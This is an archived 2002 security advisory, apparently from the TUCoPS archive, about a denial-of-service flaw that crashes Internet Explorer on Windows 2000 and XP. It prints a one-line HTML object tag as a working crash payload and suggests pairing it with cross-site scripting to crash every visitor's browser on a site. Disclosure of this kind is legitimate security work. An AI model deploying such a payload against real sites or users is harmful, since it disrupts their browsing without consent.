TUCoPS :: Browsers :: expl5488.htm

Internet Explorer HTML DoS
27th Jun 2002 [SBWID-5488]
COMMAND

	IE HTML DoS

SYSTEMS AFFECTED

	IE and Windows 2000 / XP

PROBLEM

	\'ken\'@FTU says :
	

	The following line of code will crash IE when the OS is Windows 2000  or
	Windows XP.
	

	<!--  start dosIE-doe.html -->
	

	<object ID=\"dosIE-doe\" 

	CLASSID=\"CLSID:00022613-0000-0000-C000-000000000046\" </object>

	

	<!-- end dosIE-doe.html -->
	

	If it were combined with another vulnerability its effect  may  be  much
	worse. (Say a XSS vulnerability also exists and an attacker could  crash
	the browser of every user that visits your ecommerce site...)

SOLUTION

	None yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH